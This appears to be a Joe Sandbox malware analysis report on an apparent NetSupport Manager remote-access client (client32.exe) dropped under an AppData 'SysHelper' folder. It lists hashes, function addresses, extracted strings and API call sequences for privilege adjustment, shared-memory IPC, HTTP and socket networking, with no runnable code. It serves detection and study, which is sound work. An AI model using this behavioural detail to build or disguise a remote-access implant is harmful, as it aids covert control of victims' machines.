Opcode Fuzzy Hash: 2a1eabe2567aaa4cee860a80ccdb82efa8afcbe4bdffb9cc2eaa13de4de2963a
Instruction Fuzzy Hash: 215135B170430A8FCBA45E699C1076BBBB6AFE1324F18846AD445CB291EE36C8C1C7D1

Function 07801BF0 Relevance: 6.5, Strings: 5, Instructions: 287COMMON

Download Yara Rule

Strings

$^q, xrefs: 07801DAC
tP^q, xrefs: 07801DF1
tP^q, xrefs: 07801DE5
$^q, xrefs: 07801D7A
$^q, xrefs: 07801DA0

Memory Dump Source

Source File: 00000005.00000002.2179256400.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7800000_powershell.jbxd

Similarity

API ID:
String ID: tP^q$tP^q$$^q$$^q$$^q
API String ID: 0-578306960
Opcode ID: bd1e6d353642386489a886004173a2cabc0c03d17e771e579d67d0f68c1eff96
Instruction ID: 024d96da237e24299a725fdcd46a1281d9ee68274fa47c973423384922378626
Opcode Fuzzy Hash: bd1e6d353642386489a886004173a2cabc0c03d17e771e579d67d0f68c1eff96
Instruction Fuzzy Hash: 92914A72B0435D8FC7648EA9AC1866EBBA5EFE6330F14846BD905CB291DA31CC45C7E1

Function 0780420A Relevance: 6.3, Strings: 5, Instructions: 78COMMON

Download Yara Rule

Strings

tP^q, xrefs: 078042C4
$^q, xrefs: 07804260
$^q, xrefs: 0780427F
$^q, xrefs: 07804228
$^q, xrefs: 07804244

Memory Dump Source

Source File: 00000005.00000002.2179256400.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7800000_powershell.jbxd

Similarity

API ID:
String ID: tP^q$$^q$$^q$$^q$$^q
API String ID: 0-324510305
Opcode ID: 991e32dd51dcd1060a3a767ffa198880a653d1a6b1a02af072b480d5d79c6078
Instruction ID: 6435897d0d3f1ac69fe130c840b4c60abfcaf701a951eba4b3c0a848aa6de4ee
Opcode Fuzzy Hash: 991e32dd51dcd1060a3a767ffa198880a653d1a6b1a02af072b480d5d79c6078
Instruction Fuzzy Hash: 872135B2B4029ACFCB648E64CC449A9B7F4AFA2611B15415AEA08DF2A1C731CD04C7D0

Function 07807B5C Relevance: 6.3, Strings: 5, Instructions: 57COMMON

Download Yara Rule

Strings

$^q, xrefs: 07807BC2
@'=, xrefs: 07807B9A
$^q, xrefs: 07807BB6
@'=, xrefs: 07807BA6
L%=, xrefs: 07807B8C

Memory Dump Source

Source File: 00000005.00000002.2179256400.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7800000_powershell.jbxd

Similarity

API ID:
String ID: @'=$@'=$L%=$$^q$$^q
API String ID: 0-3082095298
Opcode ID: 24346699db83e0a136e5ee86b16aedb3549b92b9a84aa33026503c15ca316845
Instruction ID: 4ecb46c6d2e0204b568fa69cc9c729eaf30b5eb98678c29137d81812fdb8941a
Opcode Fuzzy Hash: 24346699db83e0a136e5ee86b16aedb3549b92b9a84aa33026503c15ca316845
Instruction Fuzzy Hash: 8001DBB36093844FC7764A286C20997AFA5AFF2720B158957D580CF3AAC964DC85C7E2

Function 07804390 Relevance: 5.3, Strings: 4, Instructions: 264COMMON

Download Yara Rule

Strings

4'^q, xrefs: 07804660
$^q, xrefs: 07804445
4'^q, xrefs: 07804654
$^q, xrefs: 078043EF

Memory Dump Source

Source File: 00000005.00000002.2179256400.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7800000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q
API String ID: 0-2049395529
Opcode ID: ff23947ce30f88406979120f2731cc8c666e1e9459a9d2a21de126b20ab26dbf
Instruction ID: 7b594d0bdc93122d8395d5a95022be10fa7014caa408dcdb3f09152bc74b1301
Opcode Fuzzy Hash: ff23947ce30f88406979120f2731cc8c666e1e9459a9d2a21de126b20ab26dbf
Instruction Fuzzy Hash: 4A8150F5B453898FDB548F689C045AA7BF1AF93215F1480ABD609CF292DB32C844C7E2

Function 078051B0 Relevance: 5.3, Strings: 4, Instructions: 251COMMON

Download Yara Rule

Strings

$^q, xrefs: 0780525C
tP^q, xrefs: 0780529F
tP^q, xrefs: 07805293
$^q, xrefs: 078052F7

Memory Dump Source

Source File: 00000005.00000002.2179256400.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7800000_powershell.jbxd

Similarity

API ID:
String ID: tP^q$tP^q$$^q$$^q
API String ID: 0-263804196
Opcode ID: b6ffc44faea4a06951790e7687de48ca923dec8da55d297e2b21c71c74897207
Instruction ID: 6fcaf816da3c2ec9b97905cdd581fa2c22709ac69d14ebc271a447c1c1b47e98
Opcode Fuzzy Hash: b6ffc44faea4a06951790e7687de48ca923dec8da55d297e2b21c71c74897207
Instruction Fuzzy Hash: 4D814771B102049FD7249E689C10BAABBE6AFD9310F24C06AE805DF391CA76DC51CBE1

Function 07808D80 Relevance: 5.2, Strings: 4, Instructions: 197COMMON

Download Yara Rule

Strings

4'^q, xrefs: 07808E39
U, xrefs: 07808F05
$^q, xrefs: 07808F1E
4'^q, xrefs: 07808E45

Memory Dump Source

Source File: 00000005.00000002.2179256400.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7800000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$U$$^q
API String ID: 0-1429445579
Opcode ID: 2548ef297bbd1641280b83437d302bedeae4cae756e962ceba5a76d2d558f819
Instruction ID: 33152af1727c97e1202e46fe186b93e722785677cc403a36a18dafd1af67bb09
Opcode Fuzzy Hash: 2548ef297bbd1641280b83437d302bedeae4cae756e962ceba5a76d2d558f819
Instruction Fuzzy Hash: 495145B171431A8FCB659B789C0076ABBB2AFE6214F14846AD505CB2D1DE3AC9C1C7E1

Function 0780A968 Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

$^q, xrefs: 0780A9C4
$^q, xrefs: 0780A996
$^q, xrefs: 0780A9D0
$^q, xrefs: 0780A97A

Memory Dump Source

Source File: 00000005.00000002.2179256400.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7800000_powershell.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q
API String ID: 0-2125118731
Opcode ID: 817f5ec40b6f944c94352bf145597fae494f448f943a7b768835adedccf8f688
Instruction ID: 022c8d34e4ca798fe8c1c0d9b9d3b44a4f48f4a8499c917dc60e448bca6ad69d
Opcode Fuzzy Hash: 817f5ec40b6f944c94352bf145597fae494f448f943a7b768835adedccf8f688
Instruction Fuzzy Hash: 9B2107B271030A5BD7AC592E5C01B67A6965FE1714F25C42AA506CB3C5DD35C84583E2

Function 07800308 Relevance: 5.0, Strings: 4, Instructions: 50COMMON

Download Yara Rule

Strings

$^q, xrefs: 07800352
4'^q, xrefs: 0780037F
$^q, xrefs: 0780035E
4'^q, xrefs: 07800373

Memory Dump Source

Source File: 00000005.00000002.2179256400.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7800000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q
API String ID: 0-2049395529
Opcode ID: 023f2eec0f98f7e623b7f2b413f69b9dad8f5e1bbf025835367fc874418959b7
Instruction ID: 381cacfd5db68283241c146211330602912dd48a355898726f3d09961d1dc06c
Opcode Fuzzy Hash: 023f2eec0f98f7e623b7f2b413f69b9dad8f5e1bbf025835367fc874418959b7
Instruction Fuzzy Hash: B101DF61B5D3CA4FC32B16681C602556FB25FD3911B2A40EBC081CF2ABCD198C4983E3

Analysis Process: client32.exePID: 5304, Parent PID: 7132COMMON

Execution Graph

Execution Coverage:	5.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	7.5%
Total number of Nodes:	2000
Total number of Limit Nodes:	100

Executed Functions

Function 1109D4A0 Relevance: 100.3, APIs: 42, Strings: 15, Instructions: 501
filethreadmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 1109C750: GetCurrentProcess.KERNEL32(000F01FF,?,1102FAC3,00000000,00000000,00080000,7E4636A2,00080000,00000000,00000000), ref: 1109C77D
Part of subcall function 1109C750: OpenProcessToken.ADVAPI32(00000000), ref: 1109C784
Part of subcall function 1109C750: LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 1109C795
Part of subcall function 1109C750: AdjustTokenPrivileges.KERNELBASE(00000000), ref: 1109C7B9

LocalAlloc.KERNEL32(00000040,00000014,SeSecurityPrivilege,?,00080000,7E4636A2,00080000,00000000,00000000), ref: 1109D535
InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 1109D54E
SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000), ref: 1109D559
GetVersionExA.KERNEL32(?), ref: 1109D570
GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109D5DE
SetSecurityDescriptorSacl.ADVAPI32(00000000,00000001,?,00000000), ref: 1109D5F3
FreeLibrary.KERNEL32(00000001,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109D604
CreateFileMappingA.KERNEL32(000000FF,1102FAC3,00000004,00000000,?,?), ref: 1109D640
GetLastError.KERNEL32 ref: 1109D64D
LocalFree.KERNEL32(?), ref: 1109D676
LocalFree.KERNEL32(?), ref: 1109D683
GetLastError.KERNEL32 ref: 1109D6A0
MapViewOfFile.KERNEL32(?,000F001F,00000000,00000000,00000000), ref: 1109D6BE
LocalFree.KERNEL32(?), ref: 1109D6E9
LocalFree.KERNEL32(?), ref: 1109D6F6

Part of subcall function 1109C6C0: LoadLibraryA.KERNEL32(Advapi32.dll,00000000,1109D58E), ref: 1109C6C8

Part of subcall function 1109C700: GetProcAddress.KERNEL32(00000000,ConvertStringSecurityDescriptorToSecurityDescriptorA), ref: 1109C714

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1109D722
LocalFree.KERNEL32(?), ref: 1109D7EB
LocalFree.KERNEL32(?), ref: 1109D7F8
_memset.LIBCMT ref: 1109D810
GetTickCount.KERNEL32 ref: 1109D818
GetCurrentProcessId.KERNEL32 ref: 1109D8C4
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1109D8DF
CreateEventA.KERNEL32(?,00000000,00000000,?,?,?,?,?,?), ref: 1109D92B
GetLastError.KERNEL32 ref: 1109D934
GetLastError.KERNEL32(00000000), ref: 1109D93B
CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 1109D970
GetLastError.KERNEL32 ref: 1109D979
GetLastError.KERNEL32(00000000), ref: 1109D980
CreateEventA.KERNEL32(?,00000001,00000000,?), ref: 1109D9B6
GetLastError.KERNEL32 ref: 1109D9BF
GetLastError.KERNEL32(00000000), ref: 1109D9C6
CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 1109D9FB
GetLastError.KERNEL32 ref: 1109DA0A
GetLastError.KERNEL32(00000000), ref: 1109DA0D
LocalFree.KERNEL32(?), ref: 1109DA35
LocalFree.KERNEL32(?), ref: 1109DA42
GetCurrentThreadId.KERNEL32 ref: 1109DA73
CreateThread.KERNEL32(00000000,00002000,Function_0009D030,00000000,00000000,00000030), ref: 1109DA8D
ResetEvent.KERNEL32(?), ref: 1109DABC
ResetEvent.KERNEL32(?), ref: 1109DAC2
ResetEvent.KERNEL32(?), ref: 1109DAC8
SetEvent.KERNEL32(?), ref: 1109DACE

Strings

Error filemap exists, xrefs: 1109D7CD
Error cant map view, xrefs: 1109D6CB
cant create events, xrefs: 1109DB04
cant create filemap, xrefs: 1109D685
cant create thread, xrefs: 1109DA9A
map exists, xrefs: 1109D7FA
S:(ML;;NW;;;LW), xrefs: 1109D598
warning map exists, xrefs: 1109D7A0
Info - reusing existing filemap, xrefs: 1109D789
SeSecurityPrivilege, xrefs: 1109D50A
cant map, xrefs: 1109D6F8
IPC(%s) created, xrefs: 1109DAD8
Error cant create events, xrefs: 1109DAF7
Error creating filemap (%d), xrefs: 1109D654
Cant create event %s, e=%d (x%x), xrefs: 1109D949, 1109D98E, 1109D9D4, 1109DA17

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorLast$FreeLocal$Event$Create$DescriptorFileSecurity$CurrentProcessReset$LibraryModuleNameSaclThreadToken$AddressAdjustAllocCountDaclInitializeLoadLookupMappingOpenPrivilegePrivilegesProcTickValueVersionView_memset
String ID: Cant create event %s, e=%d (x%x)$Error cant create events$Error cant map view$Error creating filemap (%d)$Error filemap exists$IPC(%s) created$Info - reusing existing filemap$S:(ML;;NW;;;LW)$SeSecurityPrivilege$cant create events$cant create filemap$cant create thread$cant map$map exists$warning map exists
API String ID: 3291243470-2792520954
Opcode ID: 7d2eca5f92aeb90d6110f97020967db0a84e126fbda8524f3f6ea0900cc0b1d0
Instruction ID: d0fdbac131d557a40c9b368ac235ec40647fb92da06757c3bb5e6f0a5f2f1ed9
Opcode Fuzzy Hash: 7d2eca5f92aeb90d6110f97020967db0a84e126fbda8524f3f6ea0900cc0b1d0
Instruction Fuzzy Hash: 2F1270B5E002599FDB20DF65CCD4AAEB7FAFB88304F0045A9E60D97240E771A984CF61

Function 685A7030 Relevance: 89.7, APIs: 21, Strings: 30, Instructions: 406
threadlibrarysynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 68592A90: GetModuleFileNameA.KERNEL32(00000000,?,00000100), ref: 68592ACB
Part of subcall function 68592A90: _strrchr.LIBCMT ref: 68592ADA
Part of subcall function 68592A90: _strrchr.LIBCMT ref: 68592AEA
Part of subcall function 68592A90: wsprintfA.USER32 ref: 68592B05

Part of subcall function 685ADBD0: _malloc.LIBCMT ref: 685ADBE9
Part of subcall function 685ADBD0: wsprintfA.USER32 ref: 685ADC04
Part of subcall function 685ADBD0: _memset.LIBCMT ref: 685ADC27

LoadLibraryA.KERNEL32(WinInet.dll), ref: 685A7057
InitializeCriticalSection.KERNEL32(685DB898), ref: 685A70DF
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 685A70EF
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 685A7115
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 685A713B
WSAStartup.WSOCK32(00000101,685DB91A), ref: 685A7167
_malloc.LIBCMT ref: 685A71A3

Part of subcall function 685B1B69: __FF_MSGBANNER.LIBCMT ref: 685B1B82
Part of subcall function 685B1B69: __NMSG_WRITE.LIBCMT ref: 685B1B89
Part of subcall function 685B1B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,685BD3C1,685B6E81,00000001,685B6E81,?,685BF447,00000018,685D7738,0000000C,685BF4D7), ref: 685B1BAE

_memset.LIBCMT ref: 685A71D3
_calloc.LIBCMT ref: 685A7214
_malloc.LIBCMT ref: 685A728B
_memset.LIBCMT ref: 685A72C1
_malloc.LIBCMT ref: 685A72CD
_memset.LIBCMT ref: 685A7303
GetTickCount.KERNEL32 ref: 685A7361
CreateThread.KERNEL32(00000000,00004000,685A6BA0,00000000,00000000,685DBACC), ref: 685A737E
SetThreadPriority.KERNEL32(00000000,00000001), ref: 685A73AC
GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\SysHelper\Support\,00000104), ref: 685A7430
GetPrivateProfileIntA.KERNEL32(htctl.packet_tracing,mode,00000000,C:\Users\user\AppData\Roaming\SysHelper\Support\pci.ini), ref: 685A74B0
GetModuleHandleA.KERNEL32(nsmtrace), ref: 685A74C0
CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 685A7566
timeBeginPeriod.WINMM(00000001), ref: 685A7573

Strings

C:\Users\user\AppData\Roaming\SysHelper\Support\, xrefs: 685A742A, 685A7438, 685A744C
sv.hRecvThread, xrefs: 685A7397
NSM832428, xrefs: 685A7257
sv.s, xrefs: 685A71BE
WinInet.dll, xrefs: 685A7052
HTCTL32, xrefs: 685A7036
TraceRecv, xrefs: 685A74CF, 685A74FD
sv.subset.omit, xrefs: 685A72E8
sv.ResumeEvent, xrefs: 685A7150
sv.hRecvThreadReadyEvent, xrefs: 685A7104
Support\, xrefs: 685A7451
C:\Users\user\AppData\Roaming\SysHelper\Support\pci.ini, xrefs: 685A7481, 685A749B
General, xrefs: 685A733F
htctl.packet_tracing, xrefs: 685A74A8
_debug, xrefs: 685A7502, 685A7519, 685A753C, 685A754C
TraceSend, xrefs: 685A74DB, 685A7514
nsmtrace, xrefs: 685A74B6
sv.gateways, xrefs: 685A722F
NetworkSpeed, xrefs: 685A73D7
(iflags & CTL_REMOTE) == 0, xrefs: 685A73C2
*CMPI, xrefs: 685A731F
sv.subset.subset, xrefs: 685A72A6
226546, xrefs: 685A7242
mode, xrefs: 685A74A1
Trace, xrefs: 685A7547
*DisconnectTimeout, xrefs: 685A733A
sv.hResponseEvent, xrefs: 685A712A
TraceFile, xrefs: 685A7537
e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c, xrefs: 685A70FF, 685A7125, 685A714B, 685A71B9, 685A722A, 685A72A1, 685A72E3, 685A7392, 685A73BD
pci.ini, xrefs: 685A748F

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: Create$_malloc_memset$EventModule$FileNameThread_strrchrwsprintf$AllocateBeginCountCriticalHandleHeapInitializeLibraryLoadMutexPeriodPriorityPrivateProfileSectionStartupTick_calloctime
String ID: (iflags & CTL_REMOTE) == 0$*CMPI$*DisconnectTimeout$226546$C:\Users\user\AppData\Roaming\SysHelper\Support\$C:\Users\user\AppData\Roaming\SysHelper\Support\pci.ini$General$HTCTL32$NSM832428$NetworkSpeed$Support\$Trace$TraceFile$TraceRecv$TraceSend$WinInet.dll$_debug$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$htctl.packet_tracing$mode$nsmtrace$pci.ini$sv.ResumeEvent$sv.gateways$sv.hRecvThread$sv.hRecvThreadReadyEvent$sv.hResponseEvent$sv.s$sv.subset.omit$sv.subset.subset
API String ID: 3160247386-2998043124
Opcode ID: 358fa19de47a9d42cca085a42e9e9b1970fbc8db8da311e552db64a93da40cca
Instruction ID: bf6727e0cf09bfdcc17968a086c2d736e5d68eb3cb2f468a3d27a176817d2a7a
Opcode Fuzzy Hash: 358fa19de47a9d42cca085a42e9e9b1970fbc8db8da311e552db64a93da40cca
Instruction Fuzzy Hash: E3D1F6B5940305AFDB10AF688CC496E7BF9EB49348BC6442AFD59D7341E770AC408B9D

Function 11029230 Relevance: 84.5, APIs: 36, Strings: 12, Instructions: 534
libraryloadernetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(WinInet.dll,7E4636A2,74DF23A0,?,00000000), ref: 11029265
GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 110292FF
SetLastError.KERNEL32(00000078), ref: 11029313
GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 11029351
GetLastError.KERNEL32 ref: 11029372
_free.LIBCMT ref: 1102937E
GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 110293A1
GetProcAddress.KERNEL32(?,InternetOpenA), ref: 110293DB
InternetOpenA.WININET(11190240,?,?,000000FF,00000000), ref: 110293FA
SetLastError.KERNEL32(00000078), ref: 11029404
SetLastError.KERNEL32(00000078), ref: 11029411
SetLastError.KERNEL32(00000078), ref: 1102941B
_free.LIBCMT ref: 11029425

Part of subcall function 1115F3B5: HeapFree.KERNEL32(00000000,00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3CB
Part of subcall function 1115F3B5: GetLastError.KERNEL32(00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3DD

GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 110294A5
SetLastError.KERNEL32(00000078), ref: 110294BE
GetProcAddress.KERNEL32(?,InternetConnectA), ref: 110294D1
InternetConnectA.WININET(000000FF,111955E0,00000050,00000000,00000000,00000003,00000000,00000000), ref: 110294EE
GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 1102950A
SetLastError.KERNEL32(00000078), ref: 11029523
GetProcAddress.KERNEL32(?,HttpOpenRequestA), ref: 11029549
GetProcAddress.KERNEL32(?,HttpSendRequestA), ref: 1102959D
GetProcAddress.KERNEL32(?,InternetQueryDataAvailable), ref: 11029703
SetLastError.KERNEL32(00000078), ref: 110297D0
GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029822
SetLastError.KERNEL32(00000078), ref: 11029839
FreeLibrary.KERNEL32(?), ref: 1102984A

Strings

HttpQueryInfoA, xrefs: 110295E3
WinInet.dll, xrefs: 1102925D
HttpSendRequestA, xrefs: 11029597
InternetOpenA, xrefs: 110293D5
HttpOpenRequestA, xrefs: 11029543
InternetQueryDataAvailable, xrefs: 110296FD
InternetErrorDlg, xrefs: 11029640
InternetConnectA, xrefs: 110294CB
GET, xrefs: 11029569
InternetCloseHandle, xrefs: 110292F9, 1102949F, 11029504, 1102981C
://, xrefs: 11029445
InternetQueryOptionA, xrefs: 1102934B, 1102939B

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressProc$ErrorLast$FreeInternetLibrary_free$ConnectHeapLoadOpen
String ID: ://$GET$HttpOpenRequestA$HttpQueryInfoA$HttpSendRequestA$InternetCloseHandle$InternetConnectA$InternetErrorDlg$InternetOpenA$InternetQueryDataAvailable$InternetQueryOptionA$WinInet.dll
API String ID: 3391987931-913974648
Opcode ID: 3d8697c672572dd310c1a2e1d47d1d0dada750d652324d085b14bc85afb6b7cf
Instruction ID: 8a892d803199c7046cb733a2a01a4e5fa1610c0a6219e27d09306c56163d799e
Opcode Fuzzy Hash: 3d8697c672572dd310c1a2e1d47d1d0dada750d652324d085b14bc85afb6b7cf
Instruction Fuzzy Hash: AA127FB1E002299BDB11CFA9CC88A9EFBF4FF88344F60856AE555F7240EB745940CB61

Function 6859A980 Relevance: 56.4, APIs: 28, Strings: 4, Instructions: 389
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 68595840: inet_ntoa.WSOCK32(00000080,?,00000000,?,68598F91,00000000,00000000,685DB8DA,?,00000080), ref: 68595852

EnterCriticalSection.KERNEL32(685DB898,?,00000000,00000000), ref: 6859AA11
LeaveCriticalSection.KERNEL32(685DB898), ref: 6859AA58
LeaveCriticalSection.KERNEL32(685DB898), ref: 6859AA68
LeaveCriticalSection.KERNEL32(685DB898), ref: 6859AA94
WSAGetLastError.WSOCK32(?,?,?,?,?,00000000,00000000), ref: 6859AB0B
socket.WSOCK32(00000002,00000001,00000000,?,00000000,00000000), ref: 6859AB4E
WSAGetLastError.WSOCK32(00000002,00000001,00000000,?,00000000,00000000), ref: 6859AB5A
#21.WSOCK32(00000000,0000FFFF,00001001,?,00000004,00000002,00000001,00000000,?,00000000,00000000), ref: 6859AB8E
#21.WSOCK32(00000000,0000FFFF,00000080,?,00000004,00000000,0000FFFF,00001001,?,00000004,00000002,00000001,00000000,?,00000000,00000000), ref: 6859ABB1
#21.WSOCK32(00000000,00000006,00000001,?,00000004,00000002,00000001,00000000,?,00000000,00000000), ref: 6859ABE3
bind.WSOCK32(00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6859AC18
WSAGetLastError.WSOCK32(00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6859AC21
closesocket.WSOCK32(00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6859AC29
htons.WSOCK32(00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6859AC65
WSASetBlockingHook.WSOCK32(685963A0,00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6859AC76
WSAGetLastError.WSOCK32(00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6859AC8F
WSAUnhookBlockingHook.WSOCK32(00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6859AC96
closesocket.WSOCK32(00000000,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6859AC9C
WSAGetLastError.WSOCK32(?,?,?,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6859ACFD
WSAUnhookBlockingHook.WSOCK32(?,?,?,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6859AD04
closesocket.WSOCK32(00000000,?,?,?,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6859AD0A
WSAUnhookBlockingHook.WSOCK32(00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6859AD45
EnterCriticalSection.KERNEL32(685DB898,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6859AD4F
InitializeCriticalSection.KERNEL32(-685DCB4A), ref: 6859ADE6

Part of subcall function 68598FB0: _memset.LIBCMT ref: 68598FE4
Part of subcall function 68598FB0: getsockname.WSOCK32(?,?,00000010,?,02B42E90,?), ref: 68599005

